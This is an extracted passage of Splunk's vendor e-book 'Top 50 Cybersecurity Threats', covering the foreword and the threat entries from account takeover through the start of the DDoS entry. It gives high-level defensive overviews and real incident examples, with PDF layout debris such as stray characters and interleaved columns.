TOP

Top 50 Cybersecurity
Threats

Cybersecurity
Threats
 DDOS
DDOS

DDOS
www.wkiped

S
L
H
7
INVOICE
124!5

124!5 124!5
124!5

DDOS
DDOS

DDOS
 Table of
Contents
Account Takeover.................................................................6 • DNS Hijacking..............................................................46 Ransomware-as-a-Service..........................................88

Advanced Persistent Threat..........................................8 • DNS Tunneling ............................................................48 Router and Infrastructure Security........................90

Amazon Web Services (AWS) Attacks.................10 DoS Attack..............................................................................50 Shadow IT................................................................................92

Application Access Token............................................12 Drive-by Download Attack...........................................52 Simjacking...............................................................................94

Bill Fraud...................................................................................14 Insider Threat........................................................................54 Social Engineering Attack............................................96

Brute Force Attack ...........................................................16 IoT Threats..............................................................................56 Spyware ...................................................................................98

Business Invoice Fraud...................................................18 IoMT Threats..........................................................................58 SQL Injection......................................................................100

Cloud Access Management .......................................20 Macro Viruses.......................................................................60 Supply Chain Attack......................................................102

Cloud Cryptomining..........................................................22 Malicious PowerShell .....................................................62 Suspicious Cloud Authentication Activities.. 104
#
H Command and Control....................................................24 Man-in-the-Middle Attack............................................64 Suspicious Cloud Storage Activities..................106

Compromised Credentials ..........................................26 Masquerade Attack .........................................................66 Suspicious Okta Activity............................................108

Credential Dumping..........................................................28 Meltdown and Spectre Attack..................................68 Suspicious Zoom Child Processes...................... 110

Credential Reuse Attack...............................................30 Network Sniffing ................................................................70 System Misconfiguration .......................................... 112

Credential Stuffing............................................................32 Open Redirection ..............................................................72 Typosquatting.................................................................... 114

Cross-Site Scripting.........................................................34 Pass the Hash........................................................................ 74 Watering Hole Attack.................................................... 116

Cryptojacking Attack.......................................................36 Phishing.....................................................................................76 Web Session Cookie Theft........................................ 118

Data From Information Repositories.....................38 • Phishing Payloads.....................................................78 Wire Attack..........................................................................120

DDoS Attack..........................................................................40 • Spear Phishing............................................................80 Zero-Day Exploit..............................................................122

Disabling Security Tools................................................42 • Whale Phishing (Whaling)...................................82

DNS Attacks........................................................................ ..44 Privileged User Compromise......................................84

• DNS Amplification....................................................44 Ransomware..........................................................................86

 Foreword
Now more than ever, cybersecurity is essential to our future — after all, it’s vital to protecting everything we rely on today. From banking and online
commerce, to developing medicine and life-saving vaccines, to simpler things — like keeping our favorite video streaming services running.

Yet in the wake of mass migrations to the cloud and digital transformation, many organizations still haven’t reached the peak of their security operations
because of a few key challenges: An always-evolving threat landscape that pits us against creative and well-funded bad actors; the increasing complexity
of hybrid and multi-cloud environments; security teams are bogged down by an endless list of monotonous tasks and time-consuming manual processes;
and data silos caused by the proliferation of tools used inside our organizations, which create inefficiencies and blind spots.

These four challenges add up to a single reality: Security is a data problem. This is why a data-centric approach to security is paramount — arming us with
the right information at the right time, and connecting tools and teams through all the noise and complexity. An analytics-driven solution, drawing upon
end-to-end visibility and powered by machine learning (ML), is key to any organization’s success. These advanced capabilities not only give a complete
picture of your environment, but also move operations away from human intervention and basic diagnostics, towards
an automated and strengthened security defense.

How? By stitching together and contextualizing swathes of highly complex datasets, addressing threats faster
with automated alert triage, investigation and response, and honing in on anomalous behavior thanks to
out-of-the-box ML models and algorithms. All of this helps organizations improve their cyber resilience — the
ability to anticipate and adapt to compromises or attacks on cyber resources — so they can more effectively
automate security operations and safeguard the business, all the while accelerating growth and innovation.

At Splunk, we’re excited by the possibilities that data brings for a better — and more secure — future. But to
get there, we must be prepared. We need to know what we’re up against, including the threats that loom
large. That’s why we’ve put together this book of cybersecurity threats — so you can better identify
the different types of attacks out there, mitigate risk and make your business even stronger.

Gary Steele
Splunk President & CEO

4 Splunk | Top 50 Cybersecurity Threats

It may be quite a while before insights into the data they need every aspect of the business, unlock
innovation and empower the organization.
we fully understand the impact to understand the greatest Resilient teams address challenges
the pandemic years have had on threats to your security. with data at the center of everything
they do. And it shows in the results.
the global information security Data-centric security operations can
(InfoSec) landscape. More has But there is hope. Most reduce the risk of data breach, IP theft
and fraud by as much as 70%.
happened in this time than many security operations platforms
This is where it helps to know what threats
security professionals saw in have failed to fundamentally
to look out for and where this book can
their entire careers before 2020. address security as a data help. Based on the research of the Splunk
Threat Research Team, we present 50
The fact is that the challenges problem. That is actually
of the biggest cybersecurity threats
we’re facing are bigger than ever. where the opportunity lies for — plus a few more— to help security
professionals make us all feel more secure.
security professionals.
The “Great Resignation” as well
The ability to field a resilient cybersecurity
as plain-old burnout may make response is directly related to the quantity
the task seem more daunting and quality of data collected, analyzed,
and implemented in the battle to reduce
just as the security world needs business risk.
to attract and retain top talent. Realizing that the future is uncertain,
Those who haven’t already organizations are investing with resilience
in mind, to withstand the latest threats to
succumbed are overwhelmed the business and spring back stronger. In
by more alerts than ever. They’re this context, resilience means flexible. Fast.
Prepared. Proactive. Resilient organizations
spending too much time on have a strong data and technology
repetitive, manual tasks, which foundation, allowing them to engage rapidly
with whatever comes their way.
can’t possibly be helping their
Resilient security teams deliver
morale. What’s more, they lack cybersecurity solutions to protect
Top 50 Cybersecurity Threats | Splunk 5
 Account
Takeover
Account takeover is considered one of the more harmful ways to access a user’s account. The attacker typically poses
as a genuine customer, user or employee, eventually gaining entry to the accounts of the individual they’re impersonating.
Scarier yet, user credentials can be sourced from the deep web and matched against e-commerce sites with the help of
bots and other automated tools for quick and easy entry.
FitBit even fell victim to this type of attack when hackers exposed log-in details to customers’ FitBit accounts, changing the
email they registered with and then called up customer support with a complaint about the device so that they could get a
replacement under their warranty.

6 Splunk | Top 50 Cybersecurity Threats

 Account Takeover

What How Where

you need the attack the attack
to know: happens: comes from:
Rather than stealing the card or credentials Some of the most common methods include An enormous volume of our transactions
outright, account takeover is more proxy-based “checker” one-click apps, brute — financial and otherwise — take place
surreptitious, allowing the attacker to get as force botnet attacks, phishing and malware. online. For cybercriminals, acquiring account
much use out of the stolen card as possible Other methods include dumpster diving to find credentials and personal information (like
before being flagged for suspicious activity. personal information in discarded mail, and social security numbers, home addresses,
Banks, major marketplaces and financial outright buying lists of “Fullz,” a slang term for phone numbers, credit card numbers and other
services like PayPal are common targets, and full packages of identifying information sold on financial information) is a lucrative business,
any website that requires a login is susceptible the black market. Once the profile of the victim whether they choose to sell the acquired
to this attack. is purchased or built, an identity thief can use information or use it for their own gain. As such,
the information to defeat a knowledge-based these kinds of attacks can originate anywhere
authentication system. in the world.

Top 50 Cybersecurity Threats | Splunk 7

 Advanced
Persistent
Threat
In one of the most notable data breaches in U.S. history, the attack on the U.S. Office of Personnel Management
(OPM). security experts found that state-sponsored attackers used an advanced persistent threat sponsored
by the Chinese government.
The attack on OPM compromised over 4 million records, including information on current, former and prospective
federal government employees, as well as their family members, foreign contacts and even psychological information.

8 Splunk | Top 50 Cybersecurity Threats

 Advanced Persistent Threat

What How Where

you need the attack the attack
to know: happens: comes from:
An advanced persistent threat (APT) is a An APT usually consists of highly advanced Most APT groups are affiliated with, or are
highly advanced, covert threat on a computer tactics, including a fair amount of intelligence- agents of, governments of sovereign states.
system or network where an unauthorized gathering, to less sophisticated methods to An APT could also be a professional hacker
user manages to break in, avoid detection get a foothold in the system (e.g., malware and working full-time for the above. These state-
and obtain information for business or spear phishing). Various methodologies are sponsored hacking organizations usually have
political motives. Typically carried out by used to compromise the target and to maintain the resources and ability to closely research
criminals or nation-states, the main objective access. their target and determine the best point of
is financial gain or political espionage. While entry.
The most common plan of attack is to escalate
APTs continue to be associated with nation-
from a single computer to an entire network
state actors who want to steal government
by reading an authentication database,
or industry secrets, cyber criminals with no
learning which accounts have the appropriate
particular affiliation also use APTs to steal data
permissions and then leveraging them to
or intellectual property.
compromise assets. APT hackers will also
install backdoor programs (like Trojans) on
compromised computers within the exploited
environment. They do this to make sure they
can gain re-entry, even if the credentials are
changed later.

Top 50 Cybersecurity Threats | Splunk 9

 Amazon
Web Services
(AWS) Attacks
The number of creative attacks on virtual environments has exploded with the rise of cloud computing. And as one of the
largest cloud-service providers, Amazon Web Services has certainly had its share of threats.
There are several vulnerabilities that threaten the security of cloud providers. One digital marketing company, for example,
didn’t password protect its Amazon S3 bucket when it went out of business. The lapse exposed the data of 306,000 people.
The full leak exposed 50,000 files, totaling 32GB of full names, locations, email addresses, phone numbers and hashed out
passwords, from clients such as Patrón Tequila.

10 Splunk | Top 50 Cybersecurity Threats

 Amazon Web Services (AWS) Attacks

What How Where

you need the attack the attack
to know: happens: comes from:
Amazon’s “shared responsibility” model An attack on an AWS instance can happen Because of the diversity of services being
says AWS is responsible for the environment in a number of ways. The accelerated shift to hosted on AWS and the new types of cloud
outside of the virtual machine but the the cloud brought on by the global COVID-19 threats being spun up daily, these attacks can
customer is responsible for the security inside pandemic increased the number of threats for virtually come from anywhere and anyone.
of the S3 container. cloud providers.

This means threats that take advantage of It’s important to stay vigilant for activities that
vulnerabilities created by misconfigurations may be as simple as suspicious behavior inside
and deployment errors have become a of an AWS environment. Other activities to look
bigger problem as companies have out for are S3 access from unfamiliar locations
adopted cloud technologies rapidly and the and by unfamiliar users.
organization using AWS is responsible for
It’s also important to monitor and control
securing their environment. The problem is
who has access to an organization’s AWS
there are more threats that AWS customers
infrastructure. Detecting suspicious logins to
have to worry about.
AWS infrastructure provides a good starting
point for investigations. Actions, such as
abusive behaviors caused by compromised
credentials, can lead to direct monetary costs
because users are billed for any EC2 instances
created by the attacker.
Top 50 Cybersecurity Threats | Splunk 11
 Application
Access
Token
Pawn Storm, an active and aggressive espionage group, uses different strategies to gain information from their targets.
One method in particular was to abuse Open Authentication (OAuth) in advanced social engineering schemes, targeting
high profile users of free webmail.
The group also set up aggressive credential phishing attacks against the Democratic National Convention (DNC), the
Christian Democratic Union of Germany (CDU), the parliament and government of Turkey, the parliament of Montenegro,
the World Anti-Doping Agency (WADA), Al Jazeera and many other organizations.
They continue to use several malicious applications that abuse OAuth access tokens to gain access to target email
accounts, including Gmail and Yahoo Mail.

12 Splunk | Top 50 Cybersecurity Threats

 Application Access Token

What How Where

you need the attack the attack
to know: happens: comes from:
With an OAuth access token, a hacker can Attackers may use application access tokens Compromised access tokens may be used as
use the user-granted REST API to perform to bypass the typical authentication process an initial step to compromising other services.
functions such as email searching and and access restricted accounts, information or For example, if a token grants access to a
contact enumeration. With a cloud-based services on remote systems. These tokens are victim’s primary email, the attacker may be
email service, once an OAuth access token typically stolen from users and used in lieu of able to extend access to all other services that
is granted to a malicious application, it can login credentials. the target subscribes to by triggering forgotten
potentially gain long-term access to features of password routines. Direct API access through
the user account if a “refresh” token enabling a token negates the effectiveness of a second
background access is awarded. authentication factor and may be immune to
countermeasures like changing passwords.

Top 50 Cybersecurity Threats | Splunk 13

 Bill
Fraud
Zelle is a financial service that allows customers to easily send money to friends and family. Yet the very same features that
make Zelle so quick and efficient for transferring funds are also being exploited by cyberthieves for monetary gain.
Hackers and scammers use the system to pilfer funds away from consumers in payment fraud schemes, sometimes wiping
out entire bank accounts.

14 Splunk | Top 50 Cybersecurity Threats

 Bill Fraud

What How Where

you need the attack the attack
to know: happens: comes from:
Bill fraud organizations originate all over the
Bill fraud — or payment fraud — is any type This attack tricks a large number of users into
world, including the U.S. It’s typically sourced
of bogus or illegal transaction where the repeatedly paying small or reasonable amounts
to attackers with the resources, bandwidth
cybercriminal will divert funds away from of money so they don’t notice the scam. In this
and technology to create fraudulent bills that
consumers. And these schemes work — ploy, attackers send fraudulent but authentic-
look real. Like phishing, bill fraud generally
according to recent data from the FTC, looking bills instructing customers to transfer
targets a broad, random population of
consumers reported they have lost over funds from their accounts.
individuals.
$1 billion in fraud complaints from January
Knowing that most customers regularly use
2021 through March 2022.
fee-based digital services, the attackers rely
on the fact that their targets may mistakenly
assume the fraudulent bill is for a service they
actually use. Consumers will then initiate a
funds transfer or credit card payment to pay
for the phony “bill.”

Top 50 Cybersecurity Threats | Splunk 15

 Brute Force
Attack
In a now-infamous brute force attack, over 90,000 PlayStation and Sony Online
Entertainment accounts were compromised in 2011. Hackers attempted
countless username and password combinations from an unidentified third party, eventually ransacking members’
accounts for personal information.
The now-discontinued Club Nintendo also fell victim to the same type of attack in 2013, when hackers executed a
coordinated attack on over 15 million members, eventually breaking into over 25,000 forum members’ accounts. All
compromised accounts were suspended until access had been restored to the rightful owners — but the damage to
brand reputation had already been done.

16 Splunk | Top 50 Cybersecurity Threats

 Brute Force Attack

What How Where

you need the attack the attack
to know: happens: comes from:
A brute force attack aims to take personal The most basic brute force attack is a Thanks to the ease and simplicity of a brute
information, specifically usernames and dictionary attack, where the attacker force attack, hackers and cyber criminals with
passwords, by using a trial-and-error approach. systematically works through a dictionary or little-to-no technical experience can try to
This is one of the simplest ways to gain wordlist — trying each and every entry until gain access to someone’s account. The people
access to an application, server or password- they get a hit. They’ll even augment words behind these campaigns either have enough
protected account, since the attacker is with symbols and numerals, or use special time or computational power on their side to
simply trying combinations of usernames and dictionaries with leaked and/or commonly make it happen.
passwords until they eventually get in (if they used passwords. And if time or patience isn’t
ever do; a six-character password has billions on their side, automated tools for operating
of potential combinations). dictionary attacks can make this task much
faster and less cumbersome.

Top 50 Cybersecurity Threats | Splunk 17

 INVOICE
Business
Invoice Fraud
Even the largest technology firms aren’t immune to invoice fraud. According
to an investigation by Fortune Magazine, both Facebook and Google
unwittingly fell victim to a massive business invoice fraud scheme. The
fraudster, a Lithuanian man known as Evaldas Rimasauskas, created invoices impersonating a large Asian-based manufacturer
that frequently did business with the two companies to trick them into paying for bogus computer supplies. Over two years, the
fraudster duped the two tech giants into spending tens of millions of dollars. By the time the firms figured out what was going
on, Rimasauskas had allegedly stolen more than $100 million.

18 Splunk | Top 50 Cybersecurity Threats

 INVOICE
Business Invoice Fraud

What How Where

you need the attack the attack
to know: happens: comes from:
Business invoice fraud attempts to trick In this attack, victims are sent fake invoices While there are numerous individual scammers
victims into paying out on a fraudulent attempting to steal money in the hopes that pulling off business invoice fraud, many
(but convincing) bill addressed to your marks aren’t paying attention to their accounts are sourced to fraud rings that have the
organization. In reality, the funds go to payable processes. Hackers will pick targets organization and the resources to research
imposters mimicking suppliers. based on the size of their business, location their victim’s banking institution and create a
These hackers will often bill a reasonable and the suppliers used and create phony billing experience that feels real. Fraud rings
amount so they don’t draw suspicion. invoices that appear legitimate. With the hopes conducting invoice scams can be found all over
But executing these scams hundreds or that the victim’s accounts payable department the world.
thousands of times quickly adds up. is backlogged, they send false invoices with
high demands like “90 days past due, pay now!”

Top 50 Cybersecurity Threats | Splunk 19

 Cloud
Access
Management
Moving to the cloud has countless advantages, from fostering collaboration to allowing employees to work from almost
anywhere in the world. The importance of this flexibility was on display when the global COVID-19 pandemic hit.
But switching to a cloud-based service can carry a fair amount of risk — oftentimes due to human error.
Wyze Labs, a company that specializes in low-cost smart home products, experienced this first hand. An almost-prolific
breach occurred at the startup when an employee built a database for user analytics, only to accidentally remove the
necessary security protocols. As a result, a database-worth of customers’ personal information was exposed.

20 Splunk | Top 50 Cybersecurity Threats

 Cloud Access Management

What How Where

you need the attack the attack
to know: happens: comes from:
Managing permissions for your organization This attack usually happens because of poor Mismanagement and misconfiguration of a
has become increasingly important in communication, lack of protocol, insecure cloud environment isn’t considered a malicious
order to avoid a cloud-based breach. Lax default configuration and poor documentation. act in and of itself, and as mentioned, typically
or nonexistent security — and in this case, Once the attacker exploits the vulnerability occurs due to human error.
incorrectly configured security controls and gains a foothold in your cloud environment,
— can easily jeopardize the security of they can leverage privileges to access other
your data, exposing your organization to remote entry points, looking for insecure
an unnecessary amount of risk, including applications and databases, or weak network
significant damage to brand reputation. controls. They can then exfiltrate data while
remaining undetected.

Top 50 Cybersecurity Threats | Splunk 21

 Cloud
Cryptomining
Cloud cryptomining doesn’t need gas to go. Look no further than Tesla for evidence. The electric carmaker
fell victim to a cloud cryptomining attack when hackers took advantage of an insecure Kubernetes console, stealing
computer processing power from Tesla’s cloud environment to mine for cryptocurrencies.

22 Splunk | Top 50 Cybersecurity Threats

 Cloud Cryptomining

What How Where

you need the attack the attack
to know: happens: comes from:
Cryptomining is an intentionally difficult, Cryptomining has attracted an increasing Because cryptocurrency is a global commodity,
resource-intensive business. Its complexity amount of media attention since its explosion the attacks can originate from anywhere.
was designed to ensure that the number in popularity in the fall of 2017. The attacks Instead of focusing on where the attacks come
of blocks mined each day would remain have moved from in-browser exploits and from, it’s key to monitor cloud computing
steady. So it’s par for the course that mobile phones to enterprise cloud services, instances for activities related to cryptojacking
ambitious, yet unscrupulous, miners such as Amazon Web Services, Google Cloud and cryptomining, such as new cloud instances
make amassing the computing power of Platform (GCP) and Microsoft Azure. that originate from previously unseen regions,
large enterprises — a practice known users who launch an abnormally high number
It’s difficult to determine exactly how
as cryptojacking — a top priority. of instances, or compute instances started by
widespread the practice has become, since
previously unseen users.
hackers continually evolve their ability to
evade detection, including employing unlisted
endpoints, moderating their CPU usage and
hiding the mining pool’s IP address behind a
free content delivery network (CDN).

When miners steal a cloud instance, often

spinning up hundreds of new instances, the
costs can become astronomical for the
account holder. So it’s critical to monitor
systems for suspicious activities that could
indicate that a network has been infiltrated.

Top 50 Cybersecurity Threats | Splunk 23

 Command
and Control
The first known take down of a country’s power grid from a
cyberattack happened on December 23, 2015. The details of the hack
are summarized in detail by Wired. At about 3:30 pm local time, a
worker inside the Prykarpattyaoblenergo control center saw his mouse’s cursor move across the screen.
The ghostly cursor floated toward the digital controls of the circuit breakers at a substation, and began taking them offline.
Almost 30 substations subsequently went down, and 230,000 residents were forced to spend a cold evening in the dark in
Western Ukraine, with a blistering low of 30 degrees Fahrenheit.

24 Splunk | Top 50 Cybersecurity Threats

 Command and Control

What How Where

you need the attack the attack
to know: happens: comes from:
A command and control attack is when a Most hackers get a foothold in a system There have been prominent command and
hacker takes over a computer in order to send by phishing emails then installing malware. control attacks originating from Russia, Iran
commands or malware to other systems on the This establishes a command and control and even the U.S. These attackers can come
network. In some cases, the attacker performs channel that’s used to proxy data between from anywhere and everywhere — but they
reconnaissance activities, moving laterally the compromised endpoint and the attacker. don’t want you to know that.
across the network to gather sensitive data. These channels relay commands to the
Since communication is critical, hackers use
compromised endpoint and the output of
In other attacks, hackers may use this techniques designed to hide the true nature
those commands back to the attacker.
infrastructure to launch actual attacks. One of their correspondence. They’ll often try
of the most important functions of this to log their activities for as long as possible
infrastructure is to establish servers that will without being detected, relying on a variety
communicate with implants on compromised of techniques to communicate over these
endpoints. These attacks are also often channels while maintaining a low profile.
referred to as C2 or C&C attacks.

Top 50 Cybersecurity Threats | Splunk 25

 Compromised
Credentials
In 2020, Marriott International suffered a massive data breach as a result of a compromised credentials attack.
This breach compromised the accounts of 5.2 million Marriott customers, exposing their contact information, gender,
date of birth and loyalty account information. The attacker used the login credentials of two Marriott employees,
presumably obtained through a mix of phishing and credential stuffing, to collect Marriott customers’ information
for an entire month before raising suspicion.

26 Splunk | Top 50 Cybersecurity Threats

 Compromised Credentials

What How Where

you need the attack the attack
to know: happens: comes from:
Most people still use single-factor A password, key or other identifier that’s been Compromised credentials represent a huge
authentication to identify themselves discovered can be used by a threat actor to attack vector, giving threat actors a way into
(a pretty big no-no in the cybersecurity space). gain unauthorized access to information and computing devices, password-protected
And while stricter password requirements resources, and can range from a single account accounts and an organization’s network
are starting to be enforced (like character to an entire database. infrastructure with relative ease. These
length, a combination of symbols and numbers, perpetrators are often organized, with
By leveraging a trusted account within a
and renewal intervals), end users still repeat their sights set on a specific organization or
targeted organization, a threat actor can
credentials across accounts, platforms and person. And they’re not always outside of the
operate undetected and exfiltrate sensitive
applications, failing to update them periodically. organization — they could very well be an
data sets without raising any red flags.
insider threat who has some level of legitimate
This type of approach makes it easier for Common methods for harvesting credentials
access to the company’s systems and data.
adversaries to access a user’s account, and include the use of password sniffers, phishing
a number of today’s breaches are thanks to campaigns or malware attacks.
these credential harvesting campaigns.

Top 50 Cybersecurity Threats | Splunk 27

 Credential
Dumping
Disney+ signed up 10 million users and its stock hit a record high shortly after the launch of the streaming service. But that
shine quickly faded when many of those eager subscribers began complaining about being locked out of their accounts.
Within days of the launch, Disney+ credentials were up for grabs for as little as three dollars.
Disney said the site wasn’t actually breached — allegedly, users who found their credentials online likely fell victim to a
common (but notoriously bad) practice: using the same password across multiple sites that were later hit by a credential
dumping attack.

28 Splunk | Top 50 Cybersecurity Threats

 Credential Dumping

What How Where

you need the attack the attack
to know: happens: comes from:
Credential dumping can originate from
Credential dumping simply refers to an Credentials obtained this way usually include
anywhere. And because we’re all guilty of
attack that relies on gathering credentials those of privileged users, which may provide
recycling passwords, that information can be
from a targeted system. Even though the access to more sensitive information and
sold for future attacks.
credentials may not be in plain text — system operations. Hackers often target a
they’re often hashed or encrypted — an variety of sources to extract the credentials,
attacker can still extract the data and crack including accounts like the security accounts
it offline on their own systems. This is why manager (SAM), local security authority (LSA),
the attack is referred to as “dumping.” NTDS from domain controllers or the group
policy preference (GPP) files.
Often, hackers will try to steal passwords from
Once attackers obtain valid credentials, they
systems they have already compromised.
use them to move throughout a target network
The problem becomes amplified when
with ease, discovering new systems and
users replicate the same password across
identifying assets of interest.
multiple accounts through multiple systems.

Top 50 Cybersecurity Threats | Splunk 29

 Credential
Reuse
Attack 124!5

One of the more notable credential reuse attacks is

the 2019 Dunkin’ Donuts breach — which, unluckily
for the East Coast chain, happened to be their second
hack in two months. This time around, the threat actors
124!5 124!5
went so far as to sell thousands of accounts on the dark web.
This included users’ credentials — including their usernames
and passwords — to the highest bidder, who could then try them across other
124!5
consumer websites until they got a hit.

30 Splunk | Top 50 Cybersecurity Threats

 Credential Reuse Attack 124!5

124!5 124!5
124!5

What How Where

you need the attack the attack
to know: happens: comes from:
Credential reuse is a pervasive issue across
In theory, the attack itself is simple, This could be a targeted attack, where the
any company or userbase. Nowadays, most
straightforward and surprisingly stealthy person knows the victim and wants access
users have tens (if not hundreds) of accounts,
(if two-factor authentication isn’t activated). to their accounts for personal, professional
and are tasked with remembering countless
Once a user’s credentials are stolen, the culprit or financial reasons. The attack could also
passwords that meet all sorts of stringent
can try the same username and password on originate from a complete stranger who
requirements. As a result, they’ll resort to
other consumer or banking websites until they bought the user’s personal information on the
reusing the same password over and over
get a match — hence the “reuse” in “credential cybercrime underground.
again, in the hopes of better managing
reuse attack.”
and remembering their credentials across
accounts. Unsurprisingly, this can cause major However, gaining entry in the first place is
security issues when said credentials are a little more complicated. To get privileged
compromised. information, attackers usually kick things off
with a phishing attempt, using emails and
websites that look close-to-legitimate to dupe
the user into handing over their credentials.

Top 50 Cybersecurity Threats | Splunk 31

 X
S #
L
H
7
Credential
Stuffing
Fort Lauderdale-based Citrix Systems found itself neck deep
investigating a major network breach in 2019 that had occurred the
previous year, resulting in stolen business documents by hackers.
The FBI believed the breach was sourced for “password spraying,”
otherwise known as credential stuffing — an attempt by hackers to
remotely access a large number of accounts at once. According to a
form 10-K filing to the U.S. Securities and Exchange Commission, Citrix
believed the hackers tried to infiltrate company systems to access R @
content collaboration customer accounts.
G ! A
32 Splunk | Top 50 Cybersecurity Threats
 #
L S
H
7

Credential Stuffing

What How Where

you need the attack the attack
to know: happens: comes from:
With credential stuffing, cybercriminals Hackers only need access to login credentials, Proxies mask the location of credential
will use stolen account credentials — often an automated tool and proxies to carry out a stuffing attackers, making it challenging to
usernames and passwords procured from a credential stuffing attack. Attackers will take a detect their location. But they can be found
data breach — to access additional accounts cache of usernames and passwords, gleaned all over the world, especially in organized
by automating thousands or millions of login from massive corporate breaches, and by cybercrime hotspots. Often, attackers will
requests directed against a web application. using automated tools, essentially “stuff” those be individual and organized hackers with
They want to access sensitive accounts the credentials into the logins of other sites. access to dedicated account-checking
easy way — by simply logging in. It works tools and numerous proxies that prevent
because they rely on people reusing the their IP addresses from being blocked.
same usernames and passwords across
Less-sophisticated perpetrators may end
multiple services. If they’re successful, one
up giving themselves away by attempting
credential can unlock accounts that house
to infiltrate a large number of accounts
financial and proprietary information, giving
via bots, which results in an unexpected
them the keys to almost everything.
denial-of-service-attack (DDoS) scenario.

Top 50 Cybersecurity Threats | Splunk 33

 Cross-Site
Scripting
In January of 2019, an XSS vulnerability was discovered in
the Steam Chat client operated by Valve, a computer gaming
company with more than 90 million active users, any number of whom could have been attacked until the bug was disclosed.
Cross-site scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and
trusted websites. It’s conceptually like an SQL injection — where malicious code is entered into a form to gain access to the
site’s database — except that in the case of XSS, the malicious code is designed to execute within the browser of another
visitor to the site, allowing the attacker to steal user cookies, read session IDs, alter the contents of a website or redirect a
user to a malicious site.

34 Splunk | Top 50 Cybersecurity Threats

 Cross-Site Scripting

What How Where

you need the attack the attack
to know: happens: comes from:
There are two types of XSS attacks: stored While XSS attacks are not as common
XSS attacks occur when an attacker uses
and reflected. Stored XSS attacks occur as they once were — due primarily to
a web application to send malicious code,
when an injected script is stored on the improvements in browsers and security
generally in the form of a browser side script,
server in a fixed location, like a forum post technology — they’re still prevalent enough
to a different end user. Flaws that allow these
or comment. Every user that lands on to rank within the top ten threats listed
attacks to succeed are widespread and occur
the infected page will be affected by the by the Open Web Application Security
anywhere a web application generates input
XSS attack. In reflected XSS, the injected Project, and the Common Vulnerabilities
from a user without validating or encoding it.
script is served to a user as a response and Exposures database lists nearly 14,000
The end user’s browser has no way to to a request, like a search results page. vulnerabilities associated with XSS attacks.
know that the script should not be trusted,
automatically executing on the script. Because
it thinks the script came from a trusted source,
it can access cookies, session tokens or other
sensitive information retained by the browser.
These scripts can even rewrite the content of
the HTML page.

Top 50 Cybersecurity Threats | Splunk 35

 Cryptojacking
Attack
Cyber hackers compromised numerous Australian government websites with
malware that forced visitors’ computers to secretly mine cryptocurrency
without their permission. The cryptojacking attack was initiated when
hackers exploited a vulnerability in a popular browser plugin as part of a
larger global security breach. The attack affected the official website of the
Victorian parliament, the Queensland Civil and Administrative Tribunal, and the
Queensland Community Legal Centre homepage, among others, as well as the
UK’s National Health Service and the UK’s own data protection watchdog site.

36 Splunk | Top 50 Cybersecurity Threats

 Cryptojacking Attack

What How Where

you need the attack the attack
to know: happens: comes from:
These attacks come from all over the world
Cryptojacking is an attack where a hacker One common way cryptojacking attacks
because cryptojacking doesn’t require
targets and hijacks computer systems with happen is by sending a malicious link in a
significant technical skills. Cryptojacking kits
malware that hides on a device and then phishing email, enticing users to download
are available on the deep web for as little
exploits its processing power to mine for cryptomining code directly onto their
as $30. It’s a low bar of entry for hackers
cryptocurrency — such as Bitcoin or computer. Another way is by embedding a
that want to make a quick buck for relatively
Ethereum — all at the victim’s expense. piece of JavaScript code into a webpage
little risk. In one attack, a European bank
The hacker’s mission is to create valuable that the user visits — known as a drive-by
experienced some unusual traffic patterns
cryptocurrency with someone else’s attack. Upon visiting the page, malicious
on its servers, slower than average night
computing resources. code intended to mine cryptocurrency will
processes, and unexplained online servers —
automatically download on the machine. The
all attributed to a rogue staffer who installed a
cryptomining code then works silently in the
cryptomining system.
background without the user’s knowledge —
and a slower than usual computer might be the
only indication that something is wrong.

Top 50 Cybersecurity Threats | Splunk 37

 Data From
Information
Repositories
The threat group APT28 reportedly compromised Hillary Clinton’s campaign, the Democratic National Committee (DNC) and
the Democratic Congressional Campaign Committee (DCCC) during Clinton’s presidential run against Donald Trump. The
group has also targeted Eastern European governments, military and security-related organizations, including the North
Atlantic Treaty Organization (NATO).
The group uses a complex set of tools and strategies, surreptitiously accessing information repositories to control and steal
data. APT28 has collected information from Microsoft SharePoint services within target networks.

38 Splunk | Top 50 Cybersecurity Threats

 Data From Information Repositories

What How Where

you need the attack the attack
to know: happens: comes from:
Information repositories are tools that Information repositories often have a large Attackers like APT28 target government
allow for the storage of information — tools user base, and detecting breaches can be agencies, hotel booking websites, telecoms
like Microsoft SharePoint and Atlassian difficult. Attackers may collect information and IT companies. At a minimum, access
Confluence. Information repositories typically from shared storage repositories hosted to information repositories performed by
facilitate collaboration or information sharing on cloud infrastructure or in software- privileged users (for example, Active Directory
between users and they store a wide variety as-a-service (SaaS) applications. Domain, enterprise or schema administrators)
of data that may tempt attackers. Hackers should be closely monitored and alerted upon,
may leverage information repositories to because these types of accounts should
access and mine valuable information. not generally be used to access information
repositories. Additional log storage and
analysis infrastructure will likely be required
for more robust detection capabilities.

Top 50 Cybersecurity Threats | Splunk 39

 DDOS

DDOS
DDoS

DDOS
Attack
To date one of the biggest — if not the most significant — distributed denial-of-service (DDoS) attacks happened in 2018
against popular online code management system GitHub. GitHub was hit by an onslaught of traffic, which at its peak came
in at a rate of 1.3 terabytes per second, sending packets at a rate of 126.9 million per second. The attack wasn’t just massive,
it was record-breaking. In this attack, the botmasters flooded memcached servers with spoofed requests, which gave them
the ability to amplify their attack by 50,000x. The good news? GitHub wasn’t caught entirely unprepared. Administrators were
alerted to the attack and it was shut down within 20 minutes.

40 Splunk | Top 50 Cybersecurity Threats

 DDoS Attack

DDOS

DDOS
DDOS
What How Where
you need the attack the attack
to know: happens: comes from:
A DDoS attack is an attempt by hackers, The malicious actors behind DDoS attacks As their name implies, DDoS attacks are
hacktivists or cyber spies to take down aim to wreak havoc on their targets, sabotage distributed, meaning that the incoming
websites, slow down and crash the target web properties, damage brand reputation and flood of traffic targeting the victim’s network
servers and make online service unavailable prompt financial losses by preventing users originates from numerous sources. Thus, the
by flooding them with traffic from multiple from accessing a website or network resource. hackers behind these attacks can literally
sources. As their name suggests, DDoS attacks DDoS leverages hundreds or thousands of be from anywhere in the world. What’s
are widely distributed brute-force attempts infected “bot” computers located all over more, their distributed nature makes it
to wreak havoc and cause destruction. the world. Known as botnets, these armies impossible to stop these attacks simply
These attacks often tend to target popular of compromised computers will execute the by securing or blocking a single source.
or high-profile sites, such as banks, news attack at the same time for full effectiveness.
and government websites, to thwart or deter
The hacker or group of hackers that control
target organizations from publishing important
these infected computers then become
information or to weaken them financially.
botmasters, who infect vulnerable systems
with malware, often Trojan viruses. When
enough devices are infected, the botmaster
gives them the command to attack and the
target servers and networks are bombarded
